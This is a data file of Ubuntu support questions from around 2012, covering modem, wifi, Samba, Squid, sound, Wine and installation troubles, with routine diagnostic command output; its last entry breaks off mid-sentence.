254046	can not connect to internet in ubuntu 12.10 using mts	i have recently installed ubuntu 12.10 ( 64 bit ) . but was not able connect to internet using my mts modem . it detects my modem , but says 'not enabled ' even after enabling mobile broadband . but some times , very rarely ( once in a day ) the 'not enabled ' changed to somthing like 'cdma home network ... evdo ' and then i was able to connect . i googled around and found that this is due to buggy 'modem manager 0.6.0.0 ' which comes shipped with ubuntu 12.10 . so i removed it using software center and installed modem manager version 0.5.2.0 ) from a .deb package i have downloaded , using this code in terminal . sudo dpkg -i modemmanager_0.5.2.0-0ubuntu2_amd64.deb the problem has gone even worse . the bad part remained bad while the good part worsened . now i ca n't connect to internet even when the 'cdma home network ... evdo ' appears in place of 'not enabled ' . people found the solution working , every where around different forums . what could have gone wrong with mine ? ? i have posted the same on ubuntuforums.org but no reply yet . update now ubuntu is giving an error message in notification area . so far what i have understood is , it is due to the modemmanager_0.5.2.0 i have installed . it requires some sort of umnet dependencies . since i have installed it offline through .deb package i think it lacked some dependencies . but since i can no more connect to internet i can not repair the dependencies . kindly reply if you have any idea about umnet dependencies or something related to it .
254047	how can i install ubuntu 32 bit arquitechture when i am currently running a 64 bit windiws 7 ?	when i downloaded ubuntu from the ubuntu page , it asked me my architechture of preference ; i obviously chose x64-bit . i have been trying to install skype , but it is impossible on the 64 bit version of ubuntu 12.04 , so i tried to download the 32 bit version of ubuntu instead . every time i choose 32 bits , when installing , it automatically installs the 64 bit version . this is because i am currently running a 64 bit version of windows , and i do n't know what to do for it not to acknowledge that it 's a 64 bit system . can someone please tell me how to either install ubuntu 32 bits or skype on a 64 bit ubuntu 12.04 ? thanks .
254048	sudo su does n't change users for mysql	last night , on my server , i did : sudo su - mysql to change to the mysql user so i could run the mysql client , which is set up so it will only authenticate from the mysql account . i successfully ran the mysql client and made the change to the database . nothing changed on the server overnight . today , nothing i try will allow my to change to the mysql user . it appears to succeed , given the message about no home directory , but whoami still reports my user id and trying to run mysql still fails . wade @ snoopy : ~ $ sudo su - mysql [ sudo ] password for wade : no directory , logging in with home=/ wade @ snoopy : ~ $ whoami wade wade @ snoopy : ~ $ sudo su mysql wade @ snoopy : ~ $ whoami wade wwilliam @ snoopy : ~ $ sudo -s root @ snoopy : /home/wade # root @ snoopy : /home/wade # su mysql root @ snoopy : /home/wade # whoami root /etc/passwd for mysql : mysql : x:110:119 : mysql server , , , :/nonexistent : /bin/false has anyone ever seen behavior like this ?
254051	ca n't see windows shares from ubuntu pc 's when i boot a second windows pc	i used the information on this page : http : //www.sitepoint.com/ubuntu-12-04-lts-precise-pangolin-file-sharing-with-samba/ down to and including the `` configuring winbind '' section . if i have the windows 7 pro pc with all of the shares on the network with only ubuntu pc 's ( we have 3 ubuntu only and 3 dual boot and 1 windows only ) it works exactly like i want it to . as soon as a second windows 7 computer joins the network , all of the ubuntu machines instantly lose connection with the windows shares . and the only way i have found to get them back is by turning off all of the windows computers and booting only the one with shares . my windows computers can see my ubuntu shares just fine all of the time . all of the windows computers are running 7 pro and there is no homegroup . all of the ubuntu machines are running 12.04 ( or 12.04.1 ) if you need any more information , i 'll happily provide it . i 'm hoping it 's a simple setting i overlooked . thanks
254053	squid is not caching	i have been trying to install squid version 3.1.20 on ubuntu version 12.10 by entering sudo apt-get install squid , but the problem is the squid i installed it is not caching . i tried to browse to the same websites many times it keep showing me tcp_miss all the times . as i understand it should show tcp_hit . the configuration is very simple . i just added the below statements into the squid configuration file . acl allow_network src 172.16.0.0/16 http_access allow allow_network please help me to fix the problem .
254055	connecting to wifi fails , but aps are shown	after an update a few days ago , i am not able to connect to any wireless ap . i tried basic stuff like restarting and disabling wireless by the hardware switch . clicking on any ap will show that graphic that it shows , and i get a wireless disconnected message . this is the output of ifconfig eth0 link encap : ethernet hwaddr dc:0e : a1:6e : bb : b2 inet addr:10.10.11.86 bcast:10.10.11.255 mask:255.255.255.0 inet6 addr : fe80 : :de0e : a1ff : fe6e : bbb2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:24076 errors:0 dropped:39 overruns:0 frame:0 tx packets:15334 errors:0 dropped:0 overruns:0 carrier:5 collisions:0 txqueuelen:1000 rx bytes:15108360 ( 15.1 mb ) tx bytes:2980605 ( 2.9 mb ) interrupt:46 eth1 link encap : ethernet hwaddr e4 : d5:3d:7b : a6 : cb inet6 addr : fe80 : :e6d5:3dff : fe7b : a6cb/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:15 errors:2 dropped:0 overruns:0 frame:25528 tx packets:171 errors:86 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2045 ( 2.0 kb ) tx bytes:41601 ( 41.6 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1329 errors:0 dropped:0 overruns:0 frame:0 tx packets:1329 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:101408 ( 101.4 kb ) tx bytes:101408 ( 101.4 kb ) the output of lshw -c network is *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : c1 serial : dc:0e : a1:6e : bb : b2 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=10.10.11.86 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:46 memory : e0500000-e053ffff ioport:2000 ( size=128 ) *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth1 version : 01 serial : e4 : d5:3d:7b : a6 : cb width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : e0400000-e0403fff i also looked similar problems and a few suggested adding these lines to /etc/modprobe.d/blacklist.conf blacklist mac80211 blacklist brcm80211 blacklist cfg80211 blacklist wl blacklist lib80211_crypt_tkip blacklist lib80211 and this below line to /etc/rc.local modprobe wl i restarted after these changes , and still can not connect . a few other posts also suggested i install packages such as firmware-b43-installer , bcmwl-kernel-source and linux-firmware . however , these are already installed . i also deleted the /etc/udev/rules.d/70-persistent-net.rules so it could be created from fresh at start and the contents are as follows : # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.1/0000:08:00.0 ( wl ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' e4 : d5:3d:7b : a6 : cb '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' i am really at a loss to understand what is happening and how to arrive at a solution . can anyone help ?
254060	problem installing meld on 12.04 64 bit lts ( 1 )	i get this error during apt-get but - when i install my original disk it still does n't like it and requests this specific disk again . did not happen ( no cd request ) on another meld install on another system that was loaded using same os disk . why is it asking for cd ? never had it do that before ( on ubuntu since 9.04 ) . mdr @ mars : ~ $ sudo apt-get install meld -- fix-missing [ sudo ] password for mdr : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libglade2-0 libgnome2-0 libgnome2-bin libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgtksourceview2.0-0 libgtksourceview2.0-common python-glade2 python-gnome2 python-gtksourceview2 python-pyorbit suggested packages : libbonobo2-bin libgnomevfs2-bin libgnomevfs2-extra gamin fam gnome-mime-data python-gtk2-doc python-gnome2-doc libgtksourceview2.0-dev python-pyorbit-dbg the following new packages will be installed : libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libglade2-0 libgnome2-0 libgnome2-bin libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgtksourceview2.0-0 libgtksourceview2.0-common meld python-glade2 python-gnome2 python-gtksourceview2 python-pyorbit 0 upgraded , 20 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/2,423 kb of archives . after this operation , 11.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y media change : please insert the disc labeled 'ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ' in the drive '/cdrom/ ' and press enter
254061	ubuntu 12.10 ( 32-bit ) sound dummy output	i am running a gateway , model : 566ge , and i installed ubuntu on it . but the sound is saying dummy output . here is the ! ! alsa information script v 0.4.61 link : http : //www.alsa-project.org/db/ ? f=0acb2f3723a9dda3b2c7162d7428d555e1413c65 here is my motherboard info : myersg @ ubuntu-gateway : ~ $ sudo dmidecode -t 2 [ sudo ] password for myersg : # dmidecode 2.11 smbios 2.3 present . handle 0x0002 , dmi type 2 , 20 bytes base board information manufacturer : intel corporation product name : d915gag version : aac77881-306 serial number : bqag52803232 asset tag : base board asset tag features : board is a hosting board board is replaceable location in chassis : base board chassis location chassis handle : 0x0003 type : unknown contained object handles : 0 myersg @ ubuntu-gateway : ~ $ sudo aplay -l ** list of playback hardware devices **** myersg @ ubuntu-gateway : ~ $ lspci -v 00:00.0 host bridge : intel corporation 82915g/p/gv/gl/pl/910gl memory controller hub ( rev 04 ) subsystem : gateway 2000 device 4037 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) ( prog-if 00 [ vga controller ] ) subsystem : gateway 2000 device 4037 flags : bus master , fast devsel , latency 0 , irq 16 memory at 90100000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at ffe0 [ size=8 ] memory at 80000000 ( 32-bit , prefetchable ) [ size=256m ] memory at 90180000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) subsystem : gateway 2000 device 4037 flags : bus master , fast devsel , latency 0 , irq 44 memory at 901c0000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : 90200000-902fffff prefetchable memory behind bridge : 0000000090600000-00000000907fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 2 ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : 90300000-903fffff prefetchable memory behind bridge : 0000000090800000-00000000909fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 3 ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00005000-00005fff memory behind bridge : 90400000-904fffff prefetchable memory behind bridge : 0000000090a00000-0000000090bfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 4 ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 00006000-00006fff memory behind bridge : 90500000-905fffff prefetchable memory behind bridge : 0000000090c00000-0000000090dfffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 23 i/o ports at 2080 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at 2060 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at 2040 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at 2020 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) ( prog-if 20 [ ehci ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 23 memory at 901c4000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev d3 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=32 i/o behind bridge : 00001000-00001fff memory behind bridge : 90000000-900fffff capabilities : < access denied > 00:1f.0 isa bridge : intel corporation 82801fb/fr ( ich6/ich6r ) lpc interface bridge ( rev 03 ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 kernel driver in use : lpc_ich kernel modules : lpc_ich , intel-rng 00:1f.1 ide interface : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ide controller ( rev 03 ) ( prog-if 8a [ master secp prip ] ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at 01f0 [ size=8 ] i/o ports at 03f4 [ size=1 ] i/o ports at 0170 [ size=8 ] i/o ports at 0374 [ size=1 ] i/o ports at 20b0 [ size=16 ] kernel driver in use : ata_piix 00:1f.2 ide interface : intel corporation 82801fb/fw ( ich6/ich6w ) sata controller ( rev 03 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : gateway 2000 device 4037 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at 20c8 [ size=8 ] i/o ports at 20ec [ size=4 ] i/o ports at 20c0 [ size=8 ] i/o ports at 20e8 [ size=4 ] i/o ports at 20a0 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) smbus controller ( rev 03 ) subsystem : gateway 2000 device 4037 flags : medium devsel , irq 10 i/o ports at 2000 [ size=32 ] kernel modules : i2c-i801 05:01.0 communication controller : conexant systems , inc. hsf 56k data/fax modem subsystem : conexant systems , inc. device 2000 flags : bus master , fast back2back , medium devsel , latency 32 , irq 11 memory at 90000000 ( 32-bit , non-prefetchable ) [ size=64k ] i/o ports at 1040 [ size=8 ] capabilities : < access denied > 05:05.0 firewire ( ieee 1394 ) : lsi corporation fw322/323 [ truefire ] 1394a controller ( rev 61 ) ( prog-if 10 [ ohci ] ) subsystem : gateway 2000 device 4037 flags : bus master , fast back2back , medium devsel , latency 32 , irq 17 memory at 90011000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : firewire_ohci kernel modules : firewire-ohci 05:08.0 ethernet controller : intel corporation 82562et/ez/gt/gz - pro/100 ve ( lom ) ethernet controller ( rev 03 ) subsystem : gateway 2000 device 4037 flags : bus master , medium devsel , latency 32 , irq 20 memory at 90010000 ( 32-bit , non-prefetchable ) [ size=4k ] i/o ports at 1000 [ size=64 ] capabilities : < access denied > kernel driver in use : e100 kernel modules : e100 myersg @ ubuntu-gateway : ~ $ ls -l /dev/snd/ total 0 drwxr-xr-x 2 root root 60 feb 11 22:13 by-path crw-rw -- -t+ 1 root audio 116 , 3 feb 11 22:13 controlc0 crw-rw -- -t+ 1 root audio 116 , 2 feb 11 22:13 hwc0d2 crw-rw -- -t+ 1 root audio 116 , 1 feb 11 22:13 seq crw-rw -- -t+ 1 root audio 116 , 33 feb 11 22:13 timer myersg @ ubuntu-gateway : ~ $ cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0x901c0000 irq 44 here is my file /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2
254073	my average laptop temperature is 75c . is it normal ?	i 'm using samsung 5 series np535u4x-s01id with specification of amd quad-core a8-4555m processor and amd radeon hd 7600g + hd 7550m dual graphics . i 've just installed ubuntu 12.10 and i use the amd nee ati : thames [ radeon 7500m/7600m series ] driver which is recommended by the ubuntu software sources . but after i update to this amd `` recommended '' driver , my average laptop temperature rise up to 75c . is this normal ? or what should i do to reduce the average temperature ? ( the fan sounds loud right now . )
254075	ubuntu 12.04 installer not booting from usb	okay so this is what i did so far ... downloaded ubuntu 12.04 lts from ubunutu website . downloaded unetbootin from http : //unetbootin.sourceforge.net/ did exactly this unable to boot ubuntu 12.04 installer on usb pendrive created with universal usb installer . tried running unetbootin as administrator too but still wo n't boot . my laptop is hp pavilion g6 core i5 3rd gen. os is windows 7 32-bit . i do n't know if this is anyhow related to this issue . i tried installing ubuntu ( old version that i had written to a cd 2 years back ) . i booted successfully from cd but the installation was stuck in ubuntu loading screen . so i had to use the power button in my laptop to turnoff the machine and start again . did n't try that again and since the cd did n't work i decided to download a fresh copy ( ubuntu 12.04 lts ) from website . so ... now i am trying to install from usb because i am too lazy to go out and buy some blank dvds : | note : i have never installed or tried ubuntu before . so i am not sure what else i should do in this type of situation .
254077	when is libreoffice 4.0 coming to ubuntu 12.10 as an update ?	is libreoffice 4.0 coming to ubuntu 12.10 as an update ? if so when ? there is no deb package to upgrade that one can just double click to install lo 4.0 . the present instructions given on some websites are quite complicated . thank you . : )
254080	why ca n't i screenshare properly ?	when i am using very popular screensharing software ( skype , teamviewer ) the applications are running fine on my end , but on my partner 's end ( viewing my screen ) they say they ca n't see anything . is this due to me running on the virtual screen ? i 'm awaer there are linux based screensharers , but most people do n't use that .
254085	xvfb-run with melt hangs	i am using melt utility to flatten vidoes . in it there is a plugin called kdenlivetitle . this plugin imposes title text on video but it requires x server . for that i am using xvfb-run but it hangs in-between sometime . i know basic linux and script writing . below is the output of `` ps '' root @ ip-10-112-249-15 : /home/ubuntu # ps -ef| grep melt root 5632 32532 0 03:44 ? 00:00:00 sudo /usr/local/scripts/melt_title.sh /usr/local/tomcat/temp/231/composition.mlt exp_temp.mp4 root 5633 5632 0 03:44 ? 00:00:00 sh /usr/local/scripts/melt_title.sh /usr/local/tomcat/temp/231/composition.mlt exp_temp.mp4 //melt_title.sh has command which running belove root 5634 5633 0 03:44 ? 00:00:00 /bin/sh /usr/bin/xvfb-run -a -e /var/log/xvfb.log -- server-args=-screen 0 1920x1080x24 melt /usr/local/tomcat/temp/231/composition.mlt -consumer avformat : exp_temp.mp4 acodec=aac ab=384k ar=48000 vcodec=libx264 g=10 root 5650 5634 0 03:44 ? 00:01:17 melt /usr/local/tomcat/temp/231/composition.mlt -consumer avformat : exp_temp.mp4 acodec=aac ab=384k ar=48000 vcodec=libx264 g=10 could it be because of this command running simultaniously simultaneously ? if it is i can restrict it to one at a time . if you require any of other log or output please provide me how to get it . thanks in advanced .
254086	how do i override a dll ( without using the winecfg gui ) in wine ?	i broke something in my winecfg . thus , it wo n't run any windows apps in wine anymore . ( i can not afford to mv .wine and reinstall ) . how do i override a dll using the command line . i disabled rpcrt4.dll by accident and want to undo it . when launching winecfg or any windows application like ms word , wine prints this error message : err : module : import_dll library rpcrt4.dll ( which is needed by l '' c : \\windows\\system32\\explorer.exe '' ) not found
254089	how can one get sound louder for a laptop that comes with dolby home theater ?	is there anyway to get sound louder if you fail to enable the dolby home theater on ubuntu ? the laptop in question is a z580 lenovo . it had good sound under windows , but in ubuntu the sound is extremely soft . my guess is that the sound is so soft , because the sound system requires special drivers . there is a similar question for which the answer suggests installing pulse audio : sudo apt-get install pavucontrol on running it and going to configuration , there is actually an option for digital surround sound 5.1 , but selecting it , just kills the sound completely . alternatively , how do you boost your sound power above 100 % using the keyboard or default volume control ? using the pulse audio volume control , i am able to push the sound past 100 % which does sound much better , but i am unable to do that using the standard volume control on the desktop or using the volume up- and down keys .
254090	can i recover my windows xp files after ubuntu install ?	i installed ubuntu 10.04 on windows xp sp3 , it used all the space in the of 320 gb in the hard drive . i had 200 gb data on hard disk on this hard disk under windows xp . is it all lost ? can i get it back ? my system- 2 gb ram , 320 gb hard disk , intel core 2 duo processor can give more details if there is any hope of recovery best giri
254092	samba shares reject samba username and password from windows	i 'm running ubuntu server 12.04 lts on a hp micro server . i 've edited smb.conf and added a share called files right at the end of the file ( as per hours of googling ) as below [ files ] path = /media/files read only = no browsable = yes valid users = % s comment = shared files i have a user called brett with a password . brett also has a home directory , which i can access via windows as a mapped drive , but i ca n't get the `` files '' share to work . what am i doing wrong please ? i 'm a noob at ubuntu/linux but far from a noob at windows
254094	how can i install ubuntu landscape on my lan ?	i am planning to install ubuntu landscape server for my local network , can any one share me installation document of it and also please tell me what are the basic setup requirement ( software & hardware ) i have a trial account on https : //landscape.canonical.com/ , and i want to register my system on it , how i can do this ?
254096	dell inspiron n7110 wireless driver not working	i 've been trying to figure out how to get my wireless driver to work since i installed linux a month ago because windows was crapping out on me . i 'm new to linux , so i 'm unfamiliar with how to get certain things to work . any suggestions ? 01:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ 8086:008a ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn [ 8086:5325 ] kernel driver in use : iwlwifi -- 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : dell device [ 1028:04d8 ] kernel driver in use : r8169 *-network disabled description : wireless interface product : centrino wireless-n 1030 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 34 serial : 4c : eb:42:77 : d6 : f2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-23-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:51 memory : d0600000-d0601fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : 84:8f:69 : d2 : db : a4 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.73 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:49 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff
254099	how can i get my memory card slot to work ?	i use ubuntu 12.10 , on dell l702x , and the internal memory card slot has never functioned since i switched from its original windows 7 installation . i 've had to use my usb reader for a while now . how can i get it working , what drivers should i install ?
254102	web links in adobe reader opens firefox even if another browser ( opera , chrome ) is default	i think that title describes my problem clearly . clicking a hyperlink in adobe reader opens firefox , but i have another browser set as default . does anyone know a solution ? regards jan
254108	accidentally deleted 50-synaptics.conf	i have deleted 50-synaptics.conf from my samsung arm chromebook -- - i would love to be able to use the trackpad again . i am completely new to ubuntu and the entire experience , so a simple , straight forward answer would be much appreciated . thanks ! lukasz
254113	how do i disable usb storage ?	i 'm using ubuntu 12.04 and i want to block usb storage on it . what is the correct way to do this ?
254120	ubuntu+bazaar , update openerp through command line	i have the following enviroment : ubuntu 12.04 lts openerp 7.0 bazaar 2.5.1 in relation to a bug found on the opererp 7 . there is a patch , some user already tested and it seems to work . i installed openerp7 following the useful tutorial on www.theopensourcerer.com . one of the steps is to download and install bazaar and the download the last branch of openerp : bzr branch lp : openobject-server/7.0 server bzr branch lp : openobject-addons/7.0 addons bzr branch lp : openerp-web/7.0 web i 'm new using bazaar . have read the manual and checked some samples . but i do n't want to risk doing an update to try to correct the bug and mess up the installation . could someone instruct me on the steps to do it ? i mean , to download and install the patch ?
254121	how to format my dual boot hdd with windows and ubuntu ?	i started installing ubuntu 12.10 on my windows 7 ( 64bit ) , but then i installed a new windows and therefore deleted the old windows . i now want to uninstall ubuntu and grub , but my wubi-uninstaller.exe is not working , and i ca n't seem to find the linux partition on my hard drive . i just want to do a complete format of my hdd without rendering it useless ...
254122	ctrl + v will not work if i close the application i copied text from	i always have to keep an application open i copied text from to paste the text somewhere . in fact the copied text will be saved to klipper ( if klipper is on ) after it has been copied . but why can not a simple shortcut ctrl + v be used to paste the copied text ? os : ubuntu 10.04.4 lts , kde version : 4.4.5
254124	ubuntu 12.10 how to install on hp sleekbook 15-b040sl uefi system boot	hi i made an install on hd extern , now i can run ubuntu 12.10 from that external hard disk , it is nice but it would be better to run ubuntu on hd internal . i suspect that the hd extern installation from try ( from usb live try ) wrote something on sda2 . gparted shows on internal hd : /dev/sda1 ntfs winre 400.00 mb hidden , diag /dev/sda2 fat32 260.00 mb boot /dev/sda3 unknow 128.00 mb msftres /dev/sda4 ntfs 448.71 gib /dev/sda5 ntfs recovery 16.27 gib hidden unallocated unallocated 7.02 mib now when i run ubuntu from hd ( i press esc to see bios options , then f9 to see boot ubuntu and then i can use ubuntu . i want to add sda6 ( resizing sda4 windows 8 is installed in efi mode is it possible to use option : `` install ubuntu alongside others '' , to create a new sda6 partition for ubuntu ? is /dev/sda2 big enought to have windows8 , ubuntu from external hd and ubuntu from internal hd ? usually ubuntu ask where you want to install ubuntu , and where is mbr for boot , when i installed ubuntu on external hd i wrote sdc ( the external hd for boot ) , when installing in the internal hd where do i have to add mbr boot if asked ? my windows8 installation comes without dvd is preinstalled so if i loose the hd for some reason , i can not reistall , can you suggest me a good system back up for whole hd internal , running backup software from ubuntu from external hd ? i installed on w8 only libreoffice , so it would be nice to make an image that automatically zip or make a tar to not use alle 500g to save few g. it should be a backup for all partitions , because i really dont know how to handle special hp partitions ( it would be nice 